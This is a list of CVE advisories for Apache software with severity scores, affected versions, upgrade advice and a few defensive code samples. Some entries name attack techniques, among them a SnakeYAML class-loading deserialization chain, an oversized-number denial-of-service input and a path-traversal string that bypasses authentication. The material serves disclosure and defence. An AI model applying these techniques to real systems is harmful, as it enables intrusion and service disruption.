Deserialization of Untrusted Data vulnerability in Apache ShardingSphere-Agent, which allows attackers to execute arbitrary code by constructing a special YAML configuration file. The attacker needs to have permission to modify the ShardingSphere Agent YAML configuration file on the target machine, and the target machine can access the URL with the arbitrary code JAR. An attacker can use SnakeYAML to deserialize java.net.URLClassLoader and make it load a JAR from a specified URL, and then deserialize javax.script.ScriptEngineManager to load code using that ClassLoader. When the ShardingSphere JVM process starts and uses the ShardingSphere-Agent, the arbitrary code specified by the attacker will be executed during the deserialization of the YAML configuration file by the Agent. This issue affects ShardingSphere-Agent: through 5.3.2. This vulnerability is fixed in Apache ShardingSphere 5.4.0.

Products Affected

Vendor Product Version
apache shardingsphere *
CVE-2023-28935

** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Apache Software Foundation Apache UIMA DUCC. When using the "Distributed UIMA Cluster Computing" (DUCC) module of Apache UIMA, an authenticated user that has the permissions to modify core entities can cause command execution as the system user that runs the web process. As the "Distributed UIMA Cluster Computing" module for UIMA is retired, we do not plan to release a fix for this issue. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache unstructured_information_management_architecture -
CVE-2023-28936

Attacker can access arbitrary recording/room. Vendor: The Apache Software Foundation. Versions Affected: Apache OpenMeetings from 2.0.0 before 7.1.0.

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2023-29032

An attacker that has gained access to certain private information can use this to act as another user. Vendor: The Apache Software Foundation. Versions Affected: Apache OpenMeetings from 3.1.3 before 7.1.0.

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2023-29055

In Apache Kylin version 2.0.0 to 4.0.3, there is a Server Config web interface that displays the content of the file 'kylin.properties', which may contain server-side credentials. When the Kylin service runs over HTTP (or another plain text protocol), it is possible for network sniffers to capture the HTTP payload and get access to the content of kylin.properties and potentially the credentials it contains. To avoid this threat, users are recommended to:
* Always turn on HTTPS so that the network payload is encrypted.
* Avoid putting credentials in kylin.properties, or at least not in plain text.
* Use network firewalls to protect the server side such that it is not accessible to external attackers.
* Upgrade to Apache Kylin 4.0.4, which filters out the sensitive content that goes to the Server Config web interface.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache kylin *
CVE-2023-29215

In Apache Linkis <=1.3.1, due to the lack of effective filtering of parameters, an attacker configuring malicious MySQL JDBC parameters in the JDBC EngineConn module will trigger a deserialization vulnerability and eventually lead to remote code execution. Therefore, the parameters in the MySQL JDBC URL should be blacklisted. Versions of Apache Linkis <= 1.3.0 will be affected. We recommend users upgrade the version of Linkis to version 1.3.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-29216

In Apache Linkis <=1.3.1, because the parameters are not effectively filtered, an attacker can use the MySQL data source with malicious parameters to configure a new data source that triggers a deserialization vulnerability, eventually leading to remote code execution. Versions of Apache Linkis <= 1.3.0 will be affected. We recommend users upgrade the version of Linkis to version 1.3.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache linkis *
CVE-2023-29234

A deserialization vulnerability existed when decoding a malicious package. This issue affects Apache Dubbo: from 3.1.0 through 3.1.10, from 3.2.0 through 3.2.4. Users are recommended to upgrade to the latest version, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache dubbo *
CVE-2023-29246

An attacker who has gained access to an admin account can perform RCE via null-byte injection. Vendor: The Apache Software Foundation. Versions Affected: Apache OpenMeetings from 2.0.0 before 7.1.0.

Products Affected

Vendor Product Version
apache openmeetings *
CVE-2023-29247

Task instance details page in the UI is vulnerable to a stored XSS. This issue affects Apache Airflow: before 2.6.0.

Products Affected

Vendor Product Version
apache airflow *
CVE-2023-30428

Incorrect Authorization vulnerability in Apache Software Foundation Apache Pulsar Broker's Rest Producer allows an authenticated user with a custom HTTP header to produce a message to any topic using the broker's admin role. This issue affects Apache Pulsar Brokers: from 2.9.0 through 2.9.5, from 2.10.0 before 2.10.4, 2.11.0. The vulnerability is exploitable when an attacker can connect directly to the Pulsar Broker. If an attacker is connecting through the Pulsar Proxy, there is no known way to exploit this authorization vulnerability. There are two known risks for affected users. First, an attacker could produce garbage messages to any topic in the cluster. Second, an attacker could produce messages to the topic level policies topic for other tenants and influence topic settings that could lead to exfiltration and/or deletion of messages for other tenants. 2.8 Pulsar Broker users and earlier are unaffected. 2.9 Pulsar Broker users should upgrade to one of the patched versions. 2.10 Pulsar Broker users should upgrade to at least 2.10.4. 2.11 Pulsar Broker users should upgrade to at least 2.11.1. 3.0 Pulsar Broker users are unaffected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.2 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N 1.8 5.8

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.11.0
CVE-2023-30429

Incorrect Authorization vulnerability in Apache Software Foundation Apache Pulsar. This issue affects Apache Pulsar: before 2.10.4, and 2.11.0. When a client connects to the Pulsar Function Worker via the Pulsar Proxy where the Pulsar Proxy uses mTLS authentication to authenticate with the Pulsar Function Worker, the Pulsar Function Worker incorrectly performs authorization by using the Proxy's role for authorization instead of the client's role, which can lead to privilege escalation, especially if the proxy is configured with a superuser role. The recommended mitigation for impacted users is to upgrade the Pulsar Function Worker to a patched version. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.4. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.1. 3.0 Pulsar Function Worker users are unaffected. Any users running the Pulsar Function Worker for 2.9.* and earlier should upgrade to one of the above patched versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 9.6 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N 3.1 5.8

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.11.0
CVE-2023-30465

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.5.0. By manipulating the "orderType" parameter and the ordering of the returned content using an SQL injection attack, an attacker can extract the username of the user with ID 1 from the "user" table, one character at a time. Users are advised to upgrade to Apache InLong's 1.6.0 or cherry-pick [1] to solve it. https://programmer.help/blogs/jdbc-deserialization-vulnerability-learning.html [1] https://github.com/apache/inlong/issues/7529

Products Affected

Vendor Product Version
apache inlong 1.4.0
apache inlong 1.5.0
CVE-2023-30575

Apache Guacamole 1.5.1 and older may incorrectly calculate the lengths of instruction elements sent during the Guacamole protocol handshake, potentially allowing an attacker to inject Guacamole instructions during the handshake through specially-crafted data.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache guacamole *
CVE-2023-30576

Apache Guacamole 0.9.10 through 1.5.1 may continue to reference a freed RDP audio input buffer. Depending on timing, this may allow an attacker to execute arbitrary code with the privileges of the guacd process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.8 MEDIUM CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N 1.6 5.2

Products Affected

Vendor Product Version
apache guacamole *
CVE-2023-30601

Privilege escalation when enabling FQL/Audit logs allows a user with JMX access to run arbitrary commands as the user running Apache Cassandra. This issue affects Apache Cassandra: from 4.0.0 through 4.0.9, from 4.1.0 through 4.1.1. WORKAROUND: The vulnerability requires nodetool/JMX access to be exploitable; disable access for any non-trusted users. MITIGATION: Upgrade to 4.0.10 or 4.1.2 and leave the new FQL/Auditlog configuration property allow_nodetool_archive_command as false.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 1.8 5.9

Products Affected

Vendor Product Version
apache cassandra *
CVE-2023-30631

Improper Input Validation vulnerability in Apache Software Foundation Apache Traffic Server. The configuration option proxy.config.http.push_method_enabled didn't function. However, by default the PUSH method is blocked in the ip_allow configuration file. This issue affects Apache Traffic Server: from 8.0.0 through 9.2.0. 8.x users should upgrade to 8.1.7 or later versions; 9.x users should upgrade to 9.2.1 or later versions.

Products Affected

Vendor Product Version
fedoraproject fedora 37
fedoraproject fedora 38
debian debian_linux 10.0
apache traffic_server *
debian debian_linux 12.0
debian debian_linux 11.0
CVE-2023-30771

Incorrect Authorization vulnerability in Apache Software Foundation Apache IoTDB. This issue affects the iotdb-web-workbench component on 0.13.3. iotdb-web-workbench is an optional component of IoTDB, providing a web console of the database. This problem is fixed from version 0.13.4 of iotdb-web-workbench onwards.

Products Affected

Vendor Product Version
apache iotdb_web_workbench 0.13.3
CVE-2023-30776

An authenticated user with specific data permissions could access database connections stored passwords by requesting a specific REST API. This issue affects Apache Superset version 1.3.0 up to 2.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2023-30867

In the StreamPark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The SQL syntax is: select * from table where jobName like '%jobName%'. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache streampark *
CVE-2023-31007

Improper Authentication vulnerability in Apache Software Foundation Apache Pulsar Broker allows a client to stay connected to a broker after authentication data expires if the client connected through the Pulsar Proxy when the broker is configured with authenticateOriginalAuthData=false or if a client connects directly to a broker with a specially crafted connect command when the broker is configured with authenticateOriginalAuthData=false. This issue affects Apache Pulsar: through 2.9.4, from 2.10.0 through 2.10.3, 2.11.0. 2.9 Pulsar Broker users should upgrade to at least 2.9.5. 2.10 Pulsar Broker users should upgrade to at least 2.10.4. 2.11 Pulsar Broker users should upgrade to at least 2.11.1. 3.0 Pulsar Broker users are unaffected. Any users running the Pulsar Broker for 2.8.* and earlier should upgrade to one of the above patched versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 0.0 NONE CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:N 2.8 0.0

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 2.11.0
CVE-2023-31038

SQL injection in Log4cxx when using the ODBC appender to send log messages to a database. No fields sent to the database were properly escaped for SQL injection. This has been the case since at least version 0.9.0 (released 2003-08-06). Note that Log4cxx is a C++ framework, so only C++ applications are affected. Before version 1.1.0, the ODBC appender was automatically part of Log4cxx if the library was found when compiling the library. As of version 1.1.0, this must be explicitly enabled in order to be compiled in.

Three preconditions must be met for this vulnerability to be possible:
1. Log4cxx compiled with ODBC support (before version 1.1.0, this was auto-detected at compile time)
2. ODBCAppender enabled for logging messages to, generally done via a config file
3. User input is logged at some point. If your application does not have user input, it is unlikely to be affected.

Users are recommended to upgrade to version 1.1.0, which properly binds the parameters to the SQL statement, or migrate to the new DBAppender class, which supports an ODBC connection in addition to other databases. Note that this fix does require a configuration file update, as the old configuration files will not configure properly. An example is shown below, and more information may be found in the Log4cxx documentation on the ODBCAppender.

Example of old configuration snippet (the '%m' pattern interpolates the log message directly into the SQL text):

    <appender name="SqlODBCAppender" class="ODBCAppender">
        <param name="sql" value="INSERT INTO logs (message) VALUES ('%m')" />
        ... other params here ...
    </appender>

The migrated configuration snippet with the new ColumnMapping parameters (the '?' placeholder is bound as a parameter, so the message is never part of the SQL text):

    <appender name="SqlODBCAppender" class="ODBCAppender">
        <param name="sql" value="INSERT INTO logs (message) VALUES (?)" />
        <param name="ColumnMapping" value="message"/>
        ... other params here ...
    </appender>

Products Affected

Vendor Product Version
apache log4cxx *
CVE-2023-31039

Security vulnerability in Apache bRPC <1.5.0 on all platforms allows attackers to execute arbitrary code via ServerOptions::pid_file. An attacker that can influence the ServerOptions pid_file parameter with which the bRPC server is started can execute arbitrary code with the permissions of the bRPC process. Solution: 1. Upgrade to bRPC >= 1.5.0, download link: https://dist.apache.org/repos/dist/release/brpc/1.5.0/ 2. If you are using an old version of bRPC and it is hard to upgrade, you can apply this patch: https://github.com/apache/brpc/pull/2218

Products Affected

Vendor Product Version
apache brpc *
CVE-2023-31058

Deserialization of Untrusted Data Vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.6.0. Attackers could bypass the 'autoDeserialize' option filtering by adding blanks. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7674 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31062

Improper Privilege Management Vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.2.0 through 1.6.0. When the attacker has access to a valid (but unprivileged) account, the exploit can be executed using Burp Suite by sending a login request and following it with a subsequent HTTP request using the returned cookie. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7836 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31064

Files or Directories Accessible to External Parties vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.2.0 through 1.6.0. A user in InLong could cancel an application that doesn't belong to them. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7799 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31065

Insufficient Session Expiration vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.6.0. An old session can be used by an attacker even after the user has been deleted or the password has been changed. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7836 and https://github.com/apache/inlong/pull/7884 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31066

Files or Directories Accessible to External Parties vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.6.0. Different users in InLong could delete, edit, stop, and start others' sources. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7775 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31098

Weak Password Requirements vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.1.0 through 1.6.0. When users change their password to a simple password (with any character or symbol), attackers can easily guess the user's password and access the account. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7805 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31101

Insecure Default Initialization of Resource Vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.5.0 through 1.6.0. Users registered in InLong who joined later can see deleted users' data. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7836 to solve it.

Products Affected

Vendor Product Version
apache inlong 1.6.0
apache inlong 1.5.0
CVE-2023-31103

Exposure of Resource to Wrong Sphere Vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.6.0. Attackers can change the immutable name and type of a cluster in InLong. Users are advised to upgrade to Apache InLong's 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7891 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31122

Out-of-bounds Read vulnerability in mod_macro of Apache HTTP Server. This issue affects Apache HTTP Server: through 2.4.57.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

Products Affected

Vendor Product Version
apache http_server *
fedoraproject fedora 38
debian debian_linux 10.0
CVE-2023-31206

Exposure of Resource to Wrong Sphere vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.6.0. Attackers can change the immutable name and type of nodes in InLong. Users are advised to upgrade to Apache InLong 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7891 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31453

Incorrect Permission Assignment for Critical Resource vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.2.0 through 1.6.0. The attacker can delete others' subscriptions, even if they are not the owner of the deleted subscription. Users are advised to upgrade to Apache InLong 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7949 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31454

Incorrect Permission Assignment for Critical Resource vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.2.0 through 1.6.0. The attacker can bind any cluster, even if they are not the cluster owner. Users are advised to upgrade to Apache InLong 1.7.0 or cherry-pick https://github.com/apache/inlong/pull/7947 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-31469

A REST interface in Apache StreamPipes (versions 0.69.0 to 0.91.0) was not properly restricted to admin-only access. This allowed a non-admin user with valid login credentials to elevate privileges beyond the initially assigned roles. The issue is resolved by upgrading to StreamPipes 0.92.0.

Products Affected

Vendor Product Version
apache streampipes *
CVE-2023-32007

** UNSUPPORTED WHEN ASSIGNED ** The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This issue was disclosed earlier as CVE-2022-33891, but incorrectly claimed version 3.1.3 (which has since gone EOL) would not be affected. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. Users are recommended to upgrade to a supported version of Apache Spark, such as version 3.4.0.

Products Affected

Vendor Product Version
apache spark *
CVE-2023-32200

There are insufficient restrictions on called script functions in Apache Jena versions 4.8.0 and earlier. This allows a remote user to execute JavaScript via a SPARQL query. This issue affects Apache Jena: from 3.7.0 through 4.8.0.

Products Affected

Vendor Product Version
apache jena *
CVE-2023-32672

An incorrect authorisation check in SQL Lab in Apache Superset versions up to and including 2.1.0 allows an authenticated user to query tables that they do not have proper access to within Superset. The vulnerability can be exploited by leveraging a SQL parsing vulnerability.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2023-33008

Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache Johnzon. A malicious attacker can craft JSON input that uses very large numbers (such as 1e20000000), which Apache Johnzon deserializes into a BigDecimal; numbers that large make the conversion slow, which is a denial-of-service risk. Apache Johnzon 1.2.21 mitigates this by setting a scale limit of 1000 (by default) on the BigDecimal. This issue affects Apache Johnzon: through 1.2.20.
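
The class of guard Johnzon 1.2.21 added, shown here as an added Python example rather than Johnzon's own Java code: a JSON number literal such as 1e20000000 is cheap to hold as (digits, exponent) but expensive the moment it is expanded, so the check is applied to the raw literal before any conversion happens. The 1000 scale limit mirrors the default the advisory quotes; the limit on positive exponents, the function names and the `accepts` helper are assumptions of this illustration.

```python
import json
from decimal import Decimal, InvalidOperation

# Scale limit (digits to the right of the decimal point once the exponent is
# applied). 1000 is the default the advisory cites for Johnzon 1.2.21.
MAX_SCALE = 1000
# Limit on positive exponents as well: 1e20000000 is harmless as a Decimal but
# becomes a 20-million-digit integer on conversion. This bound is an assumption
# of the example, not something the advisory specifies.
MAX_EXPONENT = 1000


def check_number_literal(literal: str) -> Decimal:
    """Validate a raw JSON number literal and return it as a Decimal.

    Decimal stores (sign, digits, exponent) without expanding the number, so
    inspecting the exponent costs O(len(literal)), unlike a later conversion
    to an integer or to a fixed-scale value.
    """
    try:
        value = Decimal(literal)
    except InvalidOperation as exc:
        raise ValueError(f"not a number: {literal!r}") from exc
    if not value.is_finite():
        raise ValueError(f"non-finite number: {literal!r}")
    exponent = value.as_tuple().exponent
    if exponent < -MAX_SCALE:
        raise ValueError(f"scale {-exponent} exceeds limit {MAX_SCALE}: {literal!r}")
    if exponent > MAX_EXPONENT:
        raise ValueError(f"exponent {exponent} exceeds limit {MAX_EXPONENT}: {literal!r}")
    return value


def guarded_loads(text: str):
    """json.loads with the guard wired in.

    The json module hands every float literal (anything with a '.' or an
    exponent) to parse_float as its raw source string, and every integer
    literal to parse_int, so the check runs before any conversion.
    """
    return json.loads(text, parse_float=check_number_literal,
                      parse_int=check_number_literal)


def accepts(text: str) -> bool:
    """True if the document parses under the guard, False if it was rejected
    (a malformed document is also reported as rejected)."""
    try:
        guarded_loads(text)
    except ValueError:  # json.JSONDecodeError is a ValueError subclass
        return False
    return True
```

The same idea applies to any parser that maps JSON numbers onto arbitrary-precision types: bound the exponent on the literal, not on the object you have already built.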

Products Affected

Vendor Product Version
apache johnzon *
CVE-2023-33234

Arbitrary code execution in Apache Airflow CNCF Kubernetes provider version 5.0.0 allows a user to change the xcom sidecar image and resources via an Airflow connection. In order to exploit this weakness, a user would already need elevated permissions (Op or Admin) to change the connection object in this manner. Operators should upgrade to provider version 7.0.0, which has removed the vulnerability.

Products Affected

Vendor Product Version
apache airflow_cncf_kubernetes *
CVE-2023-33246

For RocketMQ versions 5.1.0 and below, under certain conditions, there is a risk of remote command execution. When several components of RocketMQ, including NameServer, Broker, and Controller, are exposed on the public internet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function to execute commands as the system user that RocketMQ is running as. Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content. To prevent these attacks, users are recommended to upgrade to version 5.1.1 or above for RocketMQ 5.x, or 4.9.6 or above for RocketMQ 4.x.

Products Affected

Vendor Product Version
apache rocketmq *
CVE-2023-33933

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Traffic Server. This issue affects Apache Traffic Server: from 8.0.0 through 9.2.0. 8.x users should upgrade to 8.1.7 or later; 9.x users should upgrade to 9.2.1 or later.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2023-33934

Improper Input Validation vulnerability in Apache Software Foundation Apache Traffic Server. This issue affects Apache Traffic Server: through 9.2.1.

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2023-34149

Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts. This issue affects Apache Struts: through 2.5.30 and through 6.1.2. Upgrade to Struts 2.5.31 or 6.1.2.1 or greater.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L 2.8 1.4

Products Affected

Vendor Product Version
apache struts *
CVE-2023-34150

** UNSUPPORTED WHEN ASSIGNED ** Use of TikaEncodingDetector in Apache Any23 can cause excessive memory usage.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L 3.9 2.5

Products Affected

Vendor Product Version
apache any23 *
CVE-2023-34189

Exposure of Resource to Wrong Sphere vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.7.0. An attacker could use an ordinary user account to delete and update processes that only an admin should be able to operate on. Users are advised to upgrade to Apache InLong 1.8.0 or cherry-pick https://github.com/apache/inlong/pull/8109 to solve it.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-34212

The JndiJmsConnectionFactoryProvider Controller Service, along with the ConsumeJMS and PublishJMS Processors, in Apache NiFi 1.8.0 through 1.21.0 allow an authenticated and authorized user to configure URL and library properties that enable deserialization of untrusted data from a remote location. The resolution validates the JNDI URL and restricts locations to a set of allowed schemes. You are recommended to upgrade to version 1.22.0 or later which fixes this issue.

Products Affected

Vendor Product Version
apache nifi *
CVE-2023-34340

Improper Authentication vulnerability in Apache Software Foundation Apache Accumulo. This issue affects Apache Accumulo: 2.1.0. Accumulo 2.1.0 contains a defect in the user authentication process that may succeed when invalid credentials are provided. Users are advised to upgrade to 2.1.1.

Products Affected

Vendor Product Version
apache accumulo 2.1.0
CVE-2023-34395

Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Apache Software Foundation Apache Airflow ODBC Provider. In OdbcHook, a privilege escalation vulnerability exists due to controllable ODBC driver parameters that allow the loading of arbitrary dynamic-link libraries, resulting in command execution. Starting with version 4.0.0, the driver can be set only from the hook constructor. This issue affects Apache Airflow ODBC Provider: before 4.0.0.

Products Affected

Vendor Product Version
apache apache-airflow-providers-odbc *
CVE-2023-34396

Allocation of Resources Without Limits or Throttling vulnerability in Apache Software Foundation Apache Struts. This issue affects Apache Struts: through 2.5.30 and through 6.1.2. Upgrade to Struts 2.5.31 or 6.1.2.1 or greater.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L 2.8 1.4

Products Affected

Vendor Product Version
apache struts *
CVE-2023-34434

Deserialization of Untrusted Data vulnerability in Apache Software Foundation Apache InLong. This issue affects Apache InLong: from 1.4.0 through 1.7.0. The attacker could bypass the current logic and achieve arbitrary file reading. To solve it, users are advised to upgrade to Apache InLong 1.8.0 or cherry-pick https://github.com/apache/inlong/pull/8130.

Products Affected

Vendor Product Version
apache inlong *
CVE-2023-34442

Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Camel. This issue affects Apache Camel: from 3.x through 3.14.8, from 3.18.x through 3.18.7, from 3.20.x through 3.20.5, and from 4.x through 4.0.0-M3. Users should upgrade to 3.14.9, 3.18.8, 3.20.6 or 3.21.0, and users on Camel 4.x should update to 4.0.0-M1.

Products Affected

Vendor Product Version
apache camel 4.0.0
apache camel *
CVE-2023-34468

The DBCPConnectionPool and HikariCPConnectionPool Controller Services in Apache NiFi 0.0.2 through 1.21.0 allow an authenticated and authorized user to configure a Database URL with the H2 driver that enables custom code execution. The resolution validates the Database URL and rejects H2 JDBC locations. You are recommended to upgrade to version 1.22.0 or later which fixes this issue.

Products Affected

Vendor Product Version
apache nifi *
CVE-2023-34478

Apache Shiro, before 1.12.0 or 2.0.0-alpha-3, may be susceptible to a path traversal attack that results in an authentication bypass when used together with APIs or other web frameworks that route requests based on non-normalized requests. Mitigation: Update to Apache Shiro 1.12.0+ or 2.0.0-alpha-3+
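
Why matching a raw request path against a filter chain is not enough when the framework behind Shiro normalizes before routing, as an added Python example (not Shiro's code): the same request is classified once by the raw path and once by the canonical path the router will actually use. The prefix chain, the sample paths and the normalization rules (single percent-decode, drop `;param` path parameters, collapse `.`, `..` and repeated slashes) are assumptions of this illustration.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical filter chain in the style of a shiro.ini [urls] section:
# first matching prefix wins. Assumed for the example.
FILTER_CHAIN = [
    ("/admin/", "authc, roles[admin]"),
    ("/api/", "authc"),
    ("/", "anon"),
]


def normalize_request_path(raw: str) -> str:
    """Canonicalise a request target the way a downstream router would before
    it looks up a handler: drop the query, percent-decode once, strip ';param'
    path parameters from each segment, then collapse '.', '..' and duplicate
    slashes. '..' above the root is clamped to the root."""
    path = unquote(raw.split("?", 1)[0])
    path = "/".join(segment.split(";", 1)[0] for segment in path.split("/"))
    normalized = posixpath.normpath(path)
    if not normalized.startswith("/"):
        normalized = "/" + normalized
    # normpath strips a trailing slash; keep it so directory prefixes still match.
    if path.endswith("/") and normalized != "/":
        normalized += "/"
    return normalized


def select_filters(path: str) -> str:
    for prefix, filters in FILTER_CHAIN:
        if path.startswith(prefix):
            return filters
    return "anon"


def filters_for_raw_path(raw: str) -> str:
    """Vulnerable shape: authorise on the path exactly as received."""
    return select_filters(raw)


def filters_for_normalized_path(raw: str) -> str:
    """Hardened shape: authorise on the same canonical path the router uses."""
    return select_filters(normalize_request_path(raw))
```

With the raw path, `/public/../admin/secret` never starts with `/admin/`, so the chain assigns `anon`; a router that resolves the `..` then serves the admin handler without authentication. Normalizing first removes the disagreement between the two components, which is the condition the advisory describes.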

Products Affected

Vendor Product Version
apache shiro 2.0.0
apache shiro *
CVE-2023-34981

A regression in the fix for bug 66512 in Apache Tomcat 11.0.0-M5, 10.1.8, 9.0.74 and 8.5.88 meant that, if a response did not include any HTTP headers, no AJP SEND_HEADERS message would be sent for the response, which in turn meant that at least one AJP proxy (mod_proxy_ajp) would use the response headers from the previous request, leading to an information leak.

Products Affected

Vendor Product Version
apache tomcat 11.0.0
